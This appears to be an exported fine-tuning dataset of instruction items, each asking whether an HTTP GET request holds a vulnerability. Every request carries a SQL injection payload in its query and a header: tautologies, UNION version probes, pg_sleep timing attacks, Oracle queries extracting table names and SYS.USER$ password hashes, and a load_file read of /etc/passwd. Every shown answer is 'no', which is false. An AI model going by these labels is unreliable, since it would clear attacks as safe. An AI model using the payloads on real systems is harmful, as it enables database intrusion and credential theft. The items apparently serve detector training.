prompt
stringlengths
436
11.2k
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=" or pg_sleep ( __TIME__ ) --", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "" or pg_sleep ( __TIME__ ) --" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=create user name identified by pass123 temporary tablespace temp default tablespace users;", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "create user name identified by pass123 temporary tablespace temp default tablespace users;" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( table_name ) FROM ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables ) WHERE LIMIT = 5 ) ) AND 'i' = 'i", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( table_name ) FROM ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables ) WHERE LIMIT = 5 ) ) AND 'i' = 'i" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = '1' or @ @1 = 1 union select 1,version ( ) -- 1'", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = '1' or @ @1 = 1 union select 1,version ( ) -- 1'" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 or 1#" ( union select 1,version ( ) -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 or 1#" ( union select 1,version ( ) -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select name from syscolumns where id = ( select id from sysobjects where name = tablename' ) --", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select name from syscolumns where id = ( select id from sysobjects where name = tablename' ) --" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=select * from users where id = 1 +$+ or 1 = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "select * from users where id = 1 +$+ or 1 = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=1; ( load_file ( char ( 47,101,116,99,47,112,97,115,115,119,100 ) ) ) ,1,1,1;", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "1; ( load_file ( char ( 47,101,116,99,47,112,97,115,115,119,100 ) ) ) ,1,1,1;" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = '1' or ||/1 = 1 union select 1,version ( ) -- 1'", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = '1' or ||/1 = 1 union select 1,version ( ) -- 1'" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = '1' or \.<\ union select 1,@@VERSION -- 1'", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = '1' or \.<\ union select 1,@@VERSION -- 1'" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=? or 1 = 1 --", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "? or 1 = 1 --" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= ) or ( 'a' = 'a", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " ) or ( 'a' = 'a" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=admin' or 1 = 1#", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "admin' or 1 = 1#" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 or " ( ]" or 1 = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 or " ( ]" or 1 = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=or 1 = 1 --", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "or 1 = 1 --" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( column_name ) FROM ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns ) WHERE LIMIT = 5 ) ) AND 'i' = 'i", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( column_name ) FROM ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns ) WHERE LIMIT = 5 ) ) AND 'i' = 'i" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = '1' %!<@ union select 1,version ( ) -- 1'", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = '1' %!<@ union select 1,version ( ) -- 1'" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 or "& ( " or 1 = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 or "& ( " or 1 = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 or "? ( " or 1 = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 or "? ( " or 1 = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=distinct", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "distinct" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=select * from users where id = '1' * ( \ ) or 1 = 1 -- 1'", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "select * from users where id = '1' * ( \ ) or 1 = 1 -- 1'" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=1 and ascii ( lower ( substring ( ( select top 1 name from sysobjects where xtype = 'u' ) , 1, 1 ) ) ) > 116", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "1 and ascii ( lower ( substring ( ( select top 1 name from sysobjects where xtype = 'u' ) , 1, 1 ) ) ) > 116" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=select * from users where id = 1 or \.<\ or 1 = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "select * from users where id = 1 or \.<\ or 1 = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=admin" or "1" = "1"--", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "admin" or "1" = "1"--" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 or "%{" or 1 = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 or "%{" or 1 = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=insert", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "insert" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 or 1#"? = 1 or 1 = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 or 1#"? = 1 or 1 = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 or "%?" or 1 = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 or "%?" or 1 = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( PASSWORD ) FROM ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ ) WHERE LIMIT = 8 ) ) AND 'i' = 'i", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( PASSWORD ) FROM ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ ) WHERE LIMIT = 8 ) ) AND 'i' = 'i" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 or "?#" or 1 = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 or "?#" or 1 = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=or 1 = 1 or "" = ", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "or 1 = 1 or "" = " }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=/**/or/**/1/**/ = /**/1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "/**/or/**/1/**/ = /**/1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 or ". ( " or 1 = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 or ". ( " or 1 = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = '1' union select ||/1,version ( ) -- 1'", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = '1' union select ||/1,version ( ) -- 1'" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = '1' union select +\.,@@VERSION -- 1'", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = '1' union select +\.,@@VERSION -- 1'" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=or 1 = 1/*", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "or 1 = 1/*" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=%27 or 1 = 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "%27 or 1 = 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 <@&@ union select 1,version ( ) -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 <@&@ union select 1,version ( ) -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = '1' union select $*$,@@VERSION -- 1'", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = '1' union select $*$,@@VERSION -- 1'" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=1; ( load_file ( char ( 47,101,116,99,47,112,97,115, ...", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "1; ( load_file ( char ( 47,101,116,99,47,112,97,115, ..." }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = '1' or $ 1 = 1 union select 1,@@VERSION -- 1'", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = '1' or $ 1 = 1 union select 1,@@VERSION -- 1'" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=select * from users where id = 1 or \.<1 or 1 = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "select * from users where id = 1 or \.<1 or 1 = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = '1' or \<\ union select 1,@@VERSION -- 1'", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = '1' or \<\ union select 1,@@VERSION -- 1'" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 union select 1||1,version ( ) -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 union select 1||1,version ( ) -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 ||1 union select null,banner from v$version where rownum = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 ||1 union select null,banner from v$version where rownum = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=select * from users where id = '1' or \.<\ or 1 = 1 -- 1'", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "select * from users where id = '1' or \.<\ or 1 = 1 -- 1'" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 or "]{" or 1 = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 or "]{" or 1 = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 or ".@" or 1 = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 or ".@" or 1 = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 or "$[" or 1 = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 or "$[" or 1 = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=or 1 --'", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "or 1 --'" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 or ",;" or 1 = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 or ",;" or 1 = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=admin" or 1 = 1#", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "admin" or 1 = 1#" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 + ( 1 ) union select null,banner from v$version where rownum = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 + ( 1 ) union select null,banner from v$version where rownum = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=\x27UNION SELECT", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "\x27UNION SELECT" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=PRINT", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "PRINT" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = '1' union select ( \. ) ,@@VERSION -- 1'", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = '1' union select ( \. ) ,@@VERSION -- 1'" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=or 1 = 1--", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "or 1 = 1--" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=1 or pg_sleep ( __TIME__ ) --", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "1 or pg_sleep ( __TIME__ ) --" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 or ",#" or 1 = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 or ",#" or 1 = 1 -- 1" }, "payload": null }[/INST] no </s>
